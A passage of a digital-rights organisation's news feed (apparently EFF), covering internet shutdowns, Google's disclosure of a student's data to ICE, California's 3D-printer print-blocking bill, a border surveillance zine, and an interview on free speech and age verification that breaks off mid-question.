This year alone, Iranians have spent one third of the year offline. And amidst the ongoing war, Iranian officials have made it clear that the internet is a privilege for those who toe the government’s official line. Even where laws do not explicitly authorize shutdowns, broadly worded provisions around national security or public order are routinely used to justify them. The result is a growing legal architecture that treats network disruptions not as extraordinary measures, but as standard tools for managing populations. When that authority is exercised over a population beyond a state’s own citizens, the consequences can be even more severe. Israel’s Ministry of Communications controls the flow of communications in and out of Palestine and has used that power to shut down internet access during periods of conflict. Over the past two and a half years, Gaza has experienced repeated outages, and experts now estimate that roughly 75% of its telecommunications infrastructure has been damaged—leaving essential services severely disrupted. Elections and the Expansion of Control Historically, most blackouts have occurred during moments of intense political tension. But authorities are increasingly using them as a tool to preempt dissent. In 2024, as more than half the world’s population headed to the polls, shutdowns followed. That year alone, authorities imposed 304 internet shutdowns across 54 countries—the highest number ever recorded, surpassing the previous record set just a year earlier. The geographic spread also widened significantly, with shutdowns affecting more countries than ever before. The Comoros imposed a shutdown for the first time, while other countries, such as Mauritius, instituted broad bans on social media platforms during elections. At least 24 countries holding elections in 2024 had a prior history of shutdowns, putting billions of people at risk of disruptions during critical democratic moments. 
What stands out is not just the scale, but the normalization. Notably, the number of shutdowns in 2025 broke the record set the year prior. Whereas network disruptions were once a rare occurrence, they are now a routine measure, increasingly treated by authorities as a standard response to periods of heightened political sensitivity.  Civil Society Fights Back Governments use all sorts of justifications—national security, curbing the spread of disinformation, and even preventing students from cheating on exams—for internet shutdowns. But civil society is watching, and documenting, network disruptions and their impact on citizens. In 2016, as shutdowns became an increasingly common tool of state control, Access Now launched the #KeepItOn campaign to coordinate global advocacy against network disruptions. The campaign includes a coalition composed of 345 advocacy groups (including EFF), research centers, detection networks, and others who work together to report on, and fight back against, internet shutdowns. Anyone can get involved by signing on to campaign action alerts, sharing their story, or reporting a shutdown in their jurisdiction. Ending this harmful practice remains the goal. In 2016, the UN passed a landmark resolution supporting human rights online and condemning internet shutdowns, and UN agencies have continued to warn against the practice. But the fight to change government practices remains an uphill battle, leading civil society—and even companies—to get creative.  During repeated shutdowns in Gaza, grassroots efforts mobilised to distribute eSIMs so Palestinians could stay connected. In 2024, EFF recognized Connecting Humanity, a Cairo-based non-profit providing eSIM access in Gaza, with its annual award for its vital work. Satellite internet such as Starlink has been supplied to people in Ukraine and Iran, though it, too, is not immune to state control. 
Alongside these efforts, civil society continues to share practical guidance on circumventing shutdowns and maintaining access to information. EFF’s mission is to ensure that technology supports freedom, justice, and innovation for all people of the world—and we’ll continue to fight back against internet shutdowns wherever they occur. This is the fourth installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. Read the rest of the series here.

  • Google Broke Its Promise to Me. Now ICE Has My Data.
    by Guest Author on April 14, 2026 at 4:01 pm

    In September 2024, Amandla Thomas-Johnson was a Ph.D. candidate studying in the U.S. on a student visa when he briefly attended a pro-Palestinian protest. In April 2025, Immigration and Customs Enforcement (ICE) sent Google an administrative subpoena requesting his data. The next month, Google gave Thomas-Johnson's information to ICE without giving him the chance to challenge the subpoena, breaking a nearly decade-long promise to notify users before handing their data to law enforcement.  Google names a handful of exceptions to this promise (such as if Google receives a gag order from a court) that do not apply to Thomas-Johnson's case. While ICE “requested” that Google not notify Thomas-Johnson, the request was not enforceable or mandated by a court. Today, the Electronic Frontier Foundation sent complaints to the California and New York Attorneys General asking them to investigate Google for deceptive trade practices for breaking that promise. You can read about the complaints here. Below is Thomas-Johnson's account of his ordeal.  Out of touch but not out of reach  I thought my ordeal with U.S. immigration authorities was over a year ago, when I left the country, crossing into Canada at Niagara Falls.   By that point, the Trump administration had effectively turned federal power against international students like me. After I attended a pro-Palestine protest at Cornell University—for all of five minutes—the administration’s rhetoric about cracking down on students protesting what we saw as genocide forced me into hiding for three months. Federal agents came to my home looking for me. A friend was detained at an airport in Tampa and interrogated about my whereabouts.  I’m currently a Ph.D. student. Before that, I was a reporter. I’m a dual British and Trinidad and Tobago citizen. I have not been accused of any crime.  I believed that once I left U.S. territory, I had also left the reach of its authorities. I was wrong.  
The email Weeks later, in Geneva, Switzerland, I received what looked like a routine email from Google. It informed me that the company had already handed over my account data to the Department of Homeland Security.  At first, I wasn’t alarmed. I had seen something similar before. An associate of mine, Momodou Taal, had received advance notice from Google and Facebook that his data had been requested. He was given advance notice of the subpoenas, and law enforcement eventually withdrew them before the companies turned over his data.  I assumed I would be given the same opportunity. But the language in my email was different. It was final: “Google has received and responded to legal process from a law enforcement authority compelling the release of information related to your Google Account.”  Google had already disclosed my data without telling me. There was no opportunity to contest it.  Google’s broken promise To be clear, this should not have happened this way. Google promises that it will notify users before their data is handed over in response to legal processes, including administrative subpoenas. That notice is meant to provide a chance to challenge the request. In my case, that safeguard was bypassed. My data was handed over without warning—at the request of an administration targeting students engaged in protected political speech.  Months later, my lawyer at the Electronic Frontier Foundation obtained the subpoena itself. On paper, the request focused largely on subscriber information: IP addresses, physical address, other identifiers, and session times and durations.  But taken together, these fragments form something far more powerful—a detailed surveillance profile. IP logs can be used to approximate location. Physical addresses show where you sleep. Session times would show when you were communicating with friends or family. 
Even without message content, the picture that emerges is intimate and invasive.   State power meets private data What this experience has made clear is that anyone can be targeted by law enforcement. And with their massive stores of data, technology companies can facilitate those arbitrary investigations. Together, they can combine state power, corporate data, and algorithmic inference in ways that are difficult to see—and even harder to challenge.  The consequences of what happened to me are not abstract. I left the United States. But I do not feel that I have left its reach. Being investigated by the federal government is intimidating. Questions run through your head. Am I now a marked individual? Will I face heightened scrutiny if I continue my reporting? Can I travel safely to see family in the Caribbean?  Who, exactly, can I hold accountable? Update: This post has been updated to include more information about Google's exceptions to their notification policy, none of which applied to the subpoena targeting Thomas-Johnson.

  • EFF to State AGs: Investigate Google's Broken Promise to Users Targeted by the Government
    by Hudson Hongo on April 14, 2026 at 4:00 pm

    Google's Failure to Warn Users About Law Enforcement Demands for Data Is Deceptive  SAN FRANCISCO – The Electronic Frontier Foundation sent complaints today to the attorneys general of California and New York urging them to investigate Google for deceptive trade practices, related to the company's broken promise to give users prior notice before disclosing their information to law enforcement.  The letters were sent on behalf of Amandla Thomas-Johnson, whose information was disclosed to U.S. Immigration and Customs Enforcement (ICE) without prior notice from Google.  For nearly a decade, Google has promised billions of users that it will notify them before disclosing their personal data to law enforcement. Many times, the company has done just that. But through a hidden and systematic practice, Google has likely violated that promise numerous times over the years. This was the case for Thomas-Johnson, a Ph.D. candidate who was targeted by ICE after briefly attending a protest, effectively preventing him from contesting an invalid subpoena for his data.  "Google should answer the question: How many other times has it broken its promise to users?” said EFF Senior Staff Attorney F. Mario Trujillo. "Advance notice is especially important now, when agencies like ICE are unconstitutionally targeting users for First Amendment-protected activity. State attorneys general should investigate Google for this deception."  On Google’s Privacy & Terms page, it promises its users that “When we receive a request from a government agency, we send an email to the user account before disclosing information.” This promise ensures that users can protect their own privacy and decide to challenge overbroad or illegal demands on their own behalf. The company lists a handful of exceptions to this policy (such as if Google receives a gag order from a court) that do not apply to Thomas-Johnson's case. 
While ICE “requested” that Google not notify Thomas-Johnson, the request was not enforceable or mandated by a court.  But on May 8, 2025, Google complied with an administrative subpoena from ICE seeking Thomas-Johnson’s subscriber information, including his name, address, IP address, and other personal identifiers. Later that same day, the company sent Thomas-Johnson a message telling him it had already complied with the subpoena, which he would have successfully challenged had he been given advance notice. Google received the subpoena in April and had more than a month to alert Thomas-Johnson.  Communication between EFF and Google later revealed that this is a systematic issue, not an isolated one. When Google does not fulfill a subpoena within a government-provided artificial deadline, the company's outside counsel explained, Google will sometimes comply with the request and provide notice to a user on the same day. The company calls this practice “simultaneous notice.”  "What this experience has made clear is that anyone can be targeted by law enforcement," said Thomas-Johnson. "And with their massive stores of data, technology companies can facilitate those arbitrary investigations. Who, exactly, can I hold accountable?"  Google must commit to ending this deception and pay for its past mistakes. The attorneys general of California and New York are empowered to stop deceptive business practices and seek financial restitution stemming from those practices. As EFF writes in its complaints, they should investigate, hold Google to its public promise to give users advance notice of law enforcement demands, and take appropriate action if necessary. Update: This press release has been updated to include more information about Google's exceptions to their notification policy, none of which applied to the subpoena targeting Thomas-Johnson.  
For the complaints: https://www.eff.org/document/eff-letter-re-google-notice-california https://www.eff.org/document/eff-letter-re-google-notice-new-york https://www.eff.org/document/eff-letter-re-google-notice-exhibits  For Thomas-Johnson's account of his ordeal: https://www.eff.org/deeplinks/2026/04/google-broke-its-promise-me-now-ice-has-my-data For more information on lawless DHS subpoenas: https://www.eff.org/deeplinks/2026/02/open-letter-tech-companies-protect-your-users-lawless-dhs-subpoenas  Contact: press@eff.org  Tags: privacy, free speech, anonymity, DHS, subpoena, federal law enforcement, Google

  • The Dangers of California’s Legislation to Censor 3D Printing
    by Cliff Braun on April 13, 2026 at 10:07 pm

    California’s bill, A.B. 2047, will not only mandate censorware — software which exists to bluntly block your speech as a user — on all 3D printers; it will also criminalize the use of open-source alternatives. Repeating the mistakes of Digital Rights Management (DRM) technologies won’t make anyone safer. What it will do is hurt innovation in the state and risk a slew of new consumer harms, ranging from surveillance to platform lock-in. California must stand with creators and reject this legislation before it’s too late. 3D printing might evoke images of props from blockbuster films, rapid prototyping, medical research, or even affordable repair parts. Yet for a growing number of legislators, the perceived threat of “ghost guns” is a reason to impose restrictions on all 3D printers. Despite 3D printing of guns already being rare and banned under existing law, California may outright criminalize any user having control over their own device.  This bill is a gift for the biggest 3D printer manufacturers looking to adopt HP’s approach to 2D printing: criminalize altering your printer’s code, lock users into your own ecosystem, and let enshittification run its course. Even worse, algorithmic print blocking will never work for its intended purpose, but it will threaten consumer choice, free expression, and privacy. A misstep here can have serious repercussions across the whole 3D printing industry, lead the way for more bad bills, and leave California with an expensive and ineffective bureaucratic mess. What’s in the California Proposal? Compared to the Washington and New York laws proposed this year, California’s is the most troubling. It criminalizes open source, reduces consumer choice, and creates a bureaucratic burden. Criminalizing Open Source and User Control A.B. 
2047 goes further than any other legislation on algorithmic print-blocking by making it a misdemeanor for the owners of these devices to disable, deactivate, or otherwise circumvent these mandated algorithms. Not only does this effectively criminalize use of any third-party, open-source 3D printer firmware, but it also enables print-blocking algorithms to parallel anti-consumer behaviors seen with DRM. Manufacturers will be able to lock users into first-party tools, parts, and “consumables” (analogous to how 2D printer ink works). They will also be able to mandate purchases through first-party stores, imposing a heavy platform tax. Additionally, manufacturers could force regular upgrade cycles through planned obsolescence by ceasing updates to a printer’s print-blocking system, thereby taking devices out of compliance and making them illegal for consumers to resell. In short, a wide range of anti-consumer practices can be enforced, potentially resulting in criminal charges. Independent of these deliberate harms manufacturers may inflict, DRM has shown that criminalizing code leads to more barriers to repair, more consumer waste, and far more cybersecurity risks by criminalizing research. Less Consumer Choice The bill favors incumbent manufacturers over newer competitors and over the interests of consumers. Less-established manufacturers will need to dedicate considerable time and resources to implementing the ineffective solutions discussed above, navigating state approval, and potentially paying licensing fees to third-party developers of sham print-blocking software. While these burdens may be absorbed by the biggest producers of this equipment, it considerably raises the barrier to entry on a technology that can otherwise be individually built from scratch with common equipment. The result is clear: fewer options for consumers and more leverage for the biggest producers.  Retailers will feel this pinch, but the second-hand market will feel it most acutely. 
Resale is an important property right for people to recoup costs and serves as an important check on inflating prices. But under this bill, such resale risks misdemeanor penalties.  The bill locks users into a walled garden; it demands manufacturers ensure 3D printers cannot be used with third-party software tools. By creating barriers to the use of popular and need-specific alternatives, this legislation will limit the utility and accessibility of these devices across a broad spectrum of lawful uses. Bureaucratic Burden  A.B. 2047’s title 21.1 §3723.633-637 creates a print-blocking bureaucracy, leaning heavily on the California Department of Justice (DOJ). Initially, the DOJ must outline the technical standards for detecting and blocking firearm parts, and later certify print-blocking algorithms and maintain lists of compliant 3D printers. If a printer or software doesn’t make it through this red tape, it will be illegal to sell in the state. The bill also requires the department to establish a database of banned blueprints that must be blocked by these algorithms. This database and printer list must be continually maintained as new printer models are released and workarounds are discovered, requiring effort from both the DOJ and printer manufacturers.  For all the cost and burden of creating and maintaining such a database, those efforts will inevitably be outpaced by rapid iterations and workarounds by people breaking existing firearms laws. Not just California Once implemented, this infrastructure will be difficult to rein in, causing unintended consequences. The database meant for firearm parts can easily expand to copyright or political speech. Scans meant to be ephemeral can be collected and surveilled. This is cause for concern for everyone, as these levers of control will extend beyond the borders of the Golden State. While California is at the forefront of print blocking, the impacts will be felt far outside of its borders. 
Once printer companies have the legal cover to build out anti-competitive and privacy-invasive tools, they will likely be rolled out globally. After all, it is not cost-effective to maintain two forks of software, two inventories of printers, and two distribution channels. Once California has created the infrastructure to censor prints, what else will it be used for? As we covered in “Print Blocking Won’t Work” these print-blocking efforts are not only doomed to fail, but will render all 3D printer users vulnerable to surveillance either by forcing them into a cloud scanning solution for “on-device” results, or by chaining them to first-party software which must connect to the cloud to regularly update its print blocking system. This law demands an unfeasible technological solution for something that is already illegal. Not only is this bad legislation with few safeguards, it risks the worst outcomes for grassroots innovation and creativity—both within the state and across the global 3D printing community. California should reject this legislation before it’s too late, and advocates everywhere should keep an eye out for similar legislation in their states. What happens in California won't just stay in California.

  • EFF 🤝 HOPE: Join Us This August!
    by Christian Romero on April 13, 2026 at 7:21 pm

    Protecting privacy and free speech online takes more than policy work—it takes community. Conferences like HOPE are where that community comes together to learn, connect, and push these ideals forward. That's why EFF is proud to be at HOPE 26. Join us at this year's Hackers On Planet Earth, August 14-16 at the New Yorker Hotel in Manhattan! Get your ticket now and support our work: throughout April EFF will receive 10% of all ticket proceeds for HOPE 26.  Grab your ticket! See EFF at HOPE 26 in New York While you're there, be sure to catch talks from EFF's technologists, attorneys, and activists covering a wide range of digital civil liberties topics. You can get a taste of the talks to come by watching last year's EFF presentations at HOPE_16 on YouTube: How a Handful of Location Data Brokers Actively Tracked Millions, and How to Stop Them — In the past year, a number of investigations have revealed the outsized role of a few select companies in gathering, storing, and selling the location data of millions of devices - and by extension people - worldwide. This talk will elaborate on the technologies, data flows, and industry players which comprise this complicated ecosystem. Ask EFF — Get an update on current EFF work, including the ongoing case against the "Department" of Government Oversight, educating the public on their digital rights, organizing communities to resist ongoing government surveillance, and more. Systems of Dehumanization: The Digital Frontlines of the War Against Bodily Autonomy — Daly covers the bad Internet bills that made sex work more dangerous, the ongoing struggle for abortion access in America, and the persecution of trans people across all spectrums of life. These issue-spaces are deeply connected, and the digital threats they face are uniquely dangerous. Come to learn about these threat models, as well as the cross-movement strategies being built for collective liberation against an authoritarian surveillance state.  
Snag a ticket by the end of April to help support EFF's work ensuring that technology works for everyone. We hope to see you there!

  • Hot Off the Press: EFF's Updated Guide to Tech at the US-Mexico Border
    by Dave Maass on April 13, 2026 at 5:35 pm

    When people see Customs & Border Protection's giant, tethered surveillance blimp flying 20 miles outside of Marfa, Texas, lots of them confuse it with an art installation. Elsewhere along the U.S.-Mexico border, surveillance towers get mistaken for cell-phone towers. And that traffic barrel? It's actually a camera. That piece of rusted litter? That's a camera too. Today we are publishing a major update to our zine, "Surveillance Technology at the U.S.-Mexico Border," the first since the second Trump administration began. To help people identify the machinery of homeland security, we've added more models of surveillance towers, newly deployed military tech, and a gallery of disguised trail cams and automated license plate readers. You can get this 40-page, full-color guide through EFF's Shop or download a Creative-Commons licensed version here. "The Battalion Search and Rescue always carries the Electronic Frontier Foundation’s zine in our desert rig," says James Holeman, who founded the humanitarian group that looks for human remains in remote parts of New Mexico and Arizona. "We’re finding new surveillance all the time, and without a resource like that, we wouldn't know what the hell we're looking at.” The original version of the zine was distributed nearly exclusively to our allies in the borderlands—journalists, humanitarian aid workers, immigrant advocates—to help them better identify and report on the technology they discover on the ground. We only made a handful available in our online shop, and they went fast. This time, we've printed enough for our broader EFF membership. Even if you don't live near the border, you can support our work uncovering how the U.S. Department of Homeland Security's technology threatens human rights by picking up a copy. The zine is the culmination of a dozen trips to the border, where we hunted surveillance towers and other tech installations. 
We attended multiple border security conventions to collect promotional and technical materials directly from vendors. We filed public records requests, reviewed thousands of pages of docs, and analyzed satellite imagery of the entire 2,000-mile border several times over. Some of the images came from local allies, like geographer Dugan Meyer and Borderlands Relief Collective, who continue to share valuable intelligence on the changing landscape of border surveillance. The update is available in English, with an updated Spanish version expected later this year. In the meantime, we have reprinted the original Spanish edition. If you want to know more, a collection of EFF's broader work on border technology is available here. And if you're curious exactly where these technologies are located, you can check our ongoing map. SUPPORT THIS WORK

  • Speaking Freely: Dr. Jean Linis-Dinco
    by David Greene on April 13, 2026 at 4:38 pm

    Dr. Jean Linis-Dinco is an activist-researcher working at the intersection of human rights and technology. Born in the Philippines and shaped by firsthand experience with inequality and state violence, Jean has spent her life pushing back against systems that profit from oppression. She refuses to accept a world where tech is just another tool for corporate gain. Instead, she fights for technologies and policies that put people before profit and justice before convenience. Jean earned her PhD in Cybersecurity from the University of New South Wales, Canberra, where she exposed how governments weaponized propaganda and disinformation during the Rohingya crisis in Myanmar. She currently serves as the Digital Rights Advisor for the Manushya Foundation. David Greene: Welcome. To get started can you just introduce yourself to folks? Jean Linis-Dinco: I'm not very good at introducing myself and I rarely do so within the context of work because I always believe that people are more than their jobs. But first, I would like to thank you for this opportunity to share my thoughts. I've learned this kind of introduction from Kumu Vicky Holt Takamine in Hawai’i. She taught me how to introduce myself beyond titles. So, my name is Jean, my waters are the West Philippine Sea, and I was born and raised in the land of resistance, one of the original eight provinces that revolted against Spain as they are represented by the eight rays of the sun on the Philippine flag. My ancestors fought for the freedom of the Filipino people against Spanish colonial rule, before we became subjugated once again, this time under the United States for another 48 years. The impacts of that history continue to reverberate through the domestic and international policies that ultimately pushed me out of my own country as an overseas Filipino worker. DG: Can you tell us a bit about Manushya Foundation? JLD: Absolutely. 
Manushya Foundation is a women-led organization that works with activists and human rights defenders who are targeted, who face harassment and transnational repression for their work. My work with them is on the policy and advocacy side in relation to their digital rights portfolio. It involves challenging laws and policies that criminalize freedom of expression or freedom of speech online. It also means confronting the role of private corporations and private platforms. Because that power is rarely transparent. Big tech power is often unaccountable, as we've seen in recent years. Working in a civil society organization like Manushya, you get involved with the work on the ground and take part in grassroot-led advocacy confronting corporate abuse. In my work, I have met people from all sorts of backgrounds. And across those encounters, I've noticed some troubling trends in some civil society organizations. There are heaps of civil society leaders who are very keen to have a seat at the table with big tech companies. It’s often hidden behind the language of ‘stakeholder engagement’. We refuse to do that at Manushya Foundation. We don’t want to be used as a rubber stamp for decisions that have already been made behind NDAs or decisions where communities most affected by these technologies were never even in the room to begin with. I think civil society organizations should not allow themselves to be drawn into that orbit. That is very contentious in this era, because I feel like civil society bought the story that big tech could be partners in progress. We walked into their boardrooms, signing NDAs as if proximity to power meant that we were shaping it. And we've seen how in the end we're actually just giving them legitimacy. They turn our critiques and our statements to endorsements. 
I don't think there is any progressive form of collaboration with big tech companies that is not extractive, because the uncomfortable truth is that not everyone who wants a seat at the table is there to change what is being served. DG: I, as someone who participates in multi-stakeholder things all the time, I completely hear that criticism. One of the things I've said is, multi-stakeholder engagement as a member of civil society takes a few forms. One, you're in the room, but you don't have a seat at the table. Two, you have a seat at the table, but you don't have a microphone. And three, they give you a microphone, but they leave the room when you talk. When we as civil society do engage, we have to be very, very intentional about ensuring it’s effective engagement. We've left many things that were “multi-stakeholder” because it was actually just NGO-washing. You know, it was only so they could say that we were sort of invited to the cocktail party afterwards.  I've heard from you before that Manushya has a bit of a regional focus. Would you say it has a feminist focus or is it broader in terms of marginalized communities? JLD: At its core, Manushya is a decolonial intersectional feminist organization. What that means is that we are fundamentally concerned with systems of power. In our work, we always ask who holds the power? Who is crushed by it? And who has been deliberately kept from it? Personally, I am critical of lean-in feminism, which was popularized by a certain Meta executive. I do not agree with that kind of feminism, because it tells us women that if we just work harder, speak louder within existing power structures, we will be free. But free to do what, exactly? To participate in the same system that exploits people? The women who can afford to lean in are women who already occupy a certain class position that makes them legible to power. 
And most of them are white women who already have the capacity or already have a standing in society to be listened to. I cannot lean in. Because lean-in feminism was never designed for women like me. And then there is girl boss feminism, which I am also very, very critical of. Because more often than not, the women who call themselves girl bosses or self-made are not actually self-made. Behind every ‘self-made’ woman is a hidden economy of invisible labor. Often, they have maids. And often, those maids are Filipino women, women like my mother. Girl boss feminism is about one woman’s liberation built on another woman's bondage. I think it is absurd to call it feminism when it is basically just class warfare with better branding. So, yes. It gets very personal. DG: Why don’t you tell us what freedom of expression and free speech mean to you?  JLD: Well, there is this concept of freedom of speech and freedom of expression, and it is viewed as something abstract because we cannot see speech. It is intangible. We can hear it, but we cannot see it. It's not something that we hold. It is not like food, water or housing. That is precisely the problem. Because at its core freedom of expression must be understood through material conditions. What that means is that it dies in the structures that govern who gets heard, who gets punished, who gets killed, who is made disappeared, whose voices are treated as disposable. I would say freedom of expression must be understood as inseparable from justice because I do not believe anyone can claim to defend freedom of expression while tolerating systems that silence through fear, that silence through poverty, that silence through surveillance. Because a person working two jobs to make ends meet, a person targeted by the state, a person whose community is over-policed, I don't think they stand on equal ground with a media mogul or a political elite. 
The definition of free expression must move beyond the question of whether speech is allowed. The real foundation of freedom of expression and freedom of speech is who can speak without consequences and who pays the price for doing so. It demands responsibility and it's not a shield for domination, because when speech is used to dehumanize or to incite violence or to reinforce structures of oppression, the imperialism of domination, then that participates in harm. A serious commitment to freedom requires us to confront that harm and not hide behind languages of rights while ignoring the realities of power. DG: How do you see that? What's the example of how that plays out, for instance in the digital rights realm now? JLD: Well, there is, as you know—one could say it's even more evident in the United States—the “freedom of speech absolutist” as we’ve seen through Elon Musk. I don’t think he actually believes in freedom of speech at all. Because from what it appears, what he only cares about is maintaining the conditions under which people who look like him get to speak. Speech does not exist in a vacuum. It is always in service of something. The question is what kind of society are we actually building? I want a society where people can speak truthfully about the conditions and be heard, where dissent is not criminalized and where expression becomes a force for transformation rather than a tool for control. Free speech is a collective condition and not an individual right. It is inseparable from the question of what kind of society we are building. Because you cannot suddenly say that you are for freedom of expression while owning the platform that decides whose speech is amplified and whose is buried by an algorithm designed to serve capital. Building that society requires dismantling the structures that have always decided who gets to speak and who gets disappeared for saying the wrong thing to the wrong people. 
DG: It always bothers me when I hear someone like Musk being called like a free speech absolutist, because, first of all, he’s certainly not an absolutist. I actually don't know anyone who is an absolutist. But also, I don't even think he cares about free speech that much. I think that's what we see in the US a lot now, people for whom it's not a sincere belief, but they get to speak as part of their privilege. There are also other people who think they deserve the privilege to speak because, societally, they've never been subjected to controls. When they see their community of people, who historically have been able to speak, and if it's not like that, that strikes them as the most horrible infringement on freedom of speech because it disturbs their view of privilege and who speaks. And when they see marginalized voices get silenced, it doesn't bother them because that's their norm. That's how I see it. JLD: I'm here on a fellowship in the UK and my main study is on the American conquest of the Philippines through national language processing. And it's really interesting. I said during my talk that the United States no longer needs to use Nazi Germany as a metaphor to describe their contemporary politics. You know, American people just need to read history books not written by white men. DG: Okay, let's dive into the age verification stuff. I think that age verification and age mandates and age regulations trying to age gate the internet are really interesting examples of the interplay between freedom of speech and a broader repression of rights. I met you at Digital Rights in Asia Pacific Assembly (DRAPAC) 2025, and I want to just give you a platform here to share your views on age verification. I was really moved by your statement at DRAPAC and what you all published on your website. JLD: I wrote that piece at a time when Australia was pushing through that legislation. And now, we are now seeing a lot of Southeast Asian countries following that route. 
It always just takes one domino to fall for everyone to follow, doesn’t it? But, what surprised me is how there’s also a lot of defeatism among some civil society organizations. I feel like they already accepted the logic of the state. There’s always this preemptive surrendering the ground on which the struggle should be taking place. And I realized the same thing is happening again. I was on a call recently with a group of civil society organizations and someone floated the idea of supporting identity verification on social media in the Philippines as a way to counter disinformation. She came from a different understanding of the political economy, but the moment I heard it, I was disappointed. The argument is dangerous and it plays with fire because it assumes that anonymity is the problem. It assumes that the solution is to hand the state and the corporations even more power, more information, more control, and give them even more ability to track and discipline people. I feel like this is the same trend we see with age-gating, because the claim with identity verification in the context of the Philippines, that it can be used responsibly if there are guardrails. That’s gambling with people’s lives. There has never been a single historical precedent where the state doesn't expand monitoring powers when it can once the door is open to surveillance. I don't think any guardrails will ever hold. Civil society groups who entertain the idea of breaking anonymity to solve misinformation are rehearsing a dangerous illusion because anonymity is not a luxury. And it feels like it is being framed that way. Anonymity is a response to the political conditions where speaking freely can cost you your life. It exists because the risks are there and they are not imagined. DG: I do think there are some people who look at age-gating from a good place. Would you say you see age verification mandates as just inevitably being tools of oppression for marginalized young people? 
JLD: Above everything, it shifts the Overton window toward the broader acceptance of surveillance. In political science, when we say we're shifting the Overton window, we mean the space of political debate in public discourse is being narrowed. And now we are seeing it move towards the same old thing of, ‘if you have nothing to hide, you have nothing to worry about.’ And when you shift the Overton window towards the broader acceptance of surveillance, we're doing something very simple and very dangerous. And it turns intrusive monitoring into a normal routine of everyday life. It starts with policies that redefine surveillance as safety. Then age-gating will be established through technical infrastructure that of course can be repurposed later. Any system capable of verifying age is also capable of verifying identity, tracking behavior, matching accounts to real people, and storing data that can be accessed by literally anyone. These policies teach people to internalize the idea that anonymity is suspicious. I think that is the most dangerous part of it--how that cultural shift is getting more and more powerful, because it moves us, the public, towards believing that only those with nothing to hide deserve rights. Then what comes next after that? Surveillance becomes a default condition for digital participation. If you cannot enter a platform without proving who you are, then surveillance becomes a prerequisite for basic communication. Then, of course, the most powerful shift is the desensitization of younger generations to being monitored. We are raising children in a system where every login requires identity checks, they will grow into adults who assume that constant tracking is normal. Then this is what shifting the Overton window looks like in practice, because once you accept that premise, you have already surrendered the most important ground. The fight is no longer about whether surveillance should exist, but how much of it you're willing to tolerate. 
And we know the people who pay the price are not men in suits. DG: Then who does pay the price? JLD: It is always the working class children and working class families. The homeless youth who rely on social media to find food, to find a place to shower. The homeless youth who rely on social media to find community and get jobs. Then we have queer young people who are also getting locked out of spaces where they could find community. And we're locking them out of those spaces because it's ‘for their safety.’ DG: So even if there was magic tech that could solve the verification part in a completely privacy protective way, you still can't get around the infringement on the rights of young people. That seems to be the goal of the law. JLD: Yeah, absolutely. Because why do you need to age-gate social media if it's not for control? We always frame things like this as protection under the guise of paternalism. But deep inside, we see how it is a tool to control a young population who are just now getting very politically active. And I feel like--as I'm now a geriatric millennial--people of my age and older generation have betrayed the younger generation for doing this at this precarious time, where there is a genocide happening, where there are countries being bombed. We are in a time of conflicts started by rich men, amid an ecological collapse, and our concern is children being online? Let’s not rob the children of today of their future. Age gating punishes the young for crises they did not create, whilst protecting those truly responsible from accountability. The reality outside of social media will not go away even if kids are shut off from it. We need to confront the truth that the conditions that ruin childhood are not on social media. They are bombs, poverty, divisive politics. They're due to how we’re killing public funding and putting it through private corporations, lining the pockets of billionaires in the name of what? 
That is the main problem of our society, but we're not addressing that. We're just locking kids out of social media, because it's easier to do that than to address the fact that society needs an overhaul. DG: And I think what we've seen with Australia is a lot of talk about how kids can evade the protections, whether they're using VPNs or somehow faking the ID and so all age-gating is doing is adding friction to the process. And that tends to have highly discriminatory effects also, right? JLD: Friction might be a minor obstacle for a wealthy child with supportive parents, but friction keeps a different child off the internet. A wealthy child might have the technical means to buy a workaround to allow them to have access. There was a story in the news about an influencer family who just moved out of the country because of the age-restricted social media ban. This is the reality—people who have the means to move will move. And those who have no means to move, those who are struggling just to put food on the table—will just stay. This is anti-poor. Age gating is anti-poor. DG: Okay, switching gears just a little bit. Was there any sort of personal experience you've had with freedom of expression that has informed how you think about the issue? Was there any kind of formative experience where you felt censored or witnessed censorship happening to someone else that really informs how you think about it now or made you care about the issue deeply? JLD: I don't think there's one specific personal experience, per se, that has shaped how I feel about freedom and liberty in general. Growing up in the Philippines, you're forced to care, especially if you're in a working-class neighborhood like where I grew up. At an early age you realize how unfair the world is. And at first, you think that it is just unfair that the other children in my classroom families can afford a pencil case and we cannot. It was also very difficult to fit in in the Philippines. 
I was labeled a troublemaker as a child. And I think some of that is actually still reminiscent of what I am today. I remember my sixth-grade history teacher approached me after reading an essay I wrote about the Philippines. She said that I should tone down my language because it will get me in trouble later in life. And I didn't understand what she meant by that. I didn't listen to her, clearly. But that instinct stayed with me and I think it followed me through life. It followed me here—you know, the idea that you should say it, but not like that. Speak, but don't disrupt. Critique, but don't offend. And I think this is where my relationship with liberty and freedom or, specifically, freedom of expression kind of took place. It was not one defining moment, but it's in a series of small friction, as you called it. Because over time, you realize that the pressure to soften your voice never disappears. And I don't think it ever will. And I chose not to then, and I choose not to now. And there’s a lot of consequences that come with that. I don't think I will be invited to a lot of panels or keynotes. But it's a hill I'm willing to die on. This is also the same pattern we see at a larger scale in the Philippines. You see communities speak out about land or about labor and then suddenly they are surveilled, they're either disappeared or dead. I realized quickly that freedom of expression exists on paper, but in practice it depends on who you are. DG: Do you think there are situations where it might be appropriate for governments, or even companies, to limit freedom of expression? And if the answer is yes, what might those be? JLD: Freedom of speech should always demand a responsibility. It has always existed within structures of power that determine whose speech is protected. So when we ask whether speech should be limited, we have to first ask. limited by whom, and in whose interest? But I don't think the government or corporations can do that. 
Corporations’ end goal is always profit. And governments have historically used the language of limitation to silence the very people who dare to challenge their authority. I believe in community-based understanding of how we actually could solve this problem, because, in the end, our relationship with our community is the core of our identity. And through those moments of interactions, we can see the freedom of speech is collective. It is always tied to building a society where people can speak truthfully, and dissent is not criminalized. It’s a matter of making sure that we understand that freedom and liberty is not an individual issue, but it’s something that affects the whole community. DG: You’re saying this is more about community norms or our broader social compact. JLD: When I say the community must decide, I am not offering you a utopia. I am offering you a different site of struggle. One that centers the people who have always known, in their bodies, what dehumanizing language does before it becomes dehumanizing violence. We have seen this dynamic in the way hate speech fuels violence back home in the Philippines, against indigenous communities, queer people, Muslims in Mindanao and the urban poor. Because language becomes permission that activates the system of policing and militarization already pointed at the most vulnerable. The main boundaries must be rooted in the politics of liberation, not the politics of control. Speech that punches up, that reveals injustice, that challenges power, that speech must be protected. But speech that punches down, that facilitates state violence, that dehumanizes people, I think that must be confronted, if not challenged or destroyed. We have to stop pretending that those two forms of speech are morally equivalent.  DG: Okay, last question, one that we like to ask everyone. Who's your free speech hero? And why? 
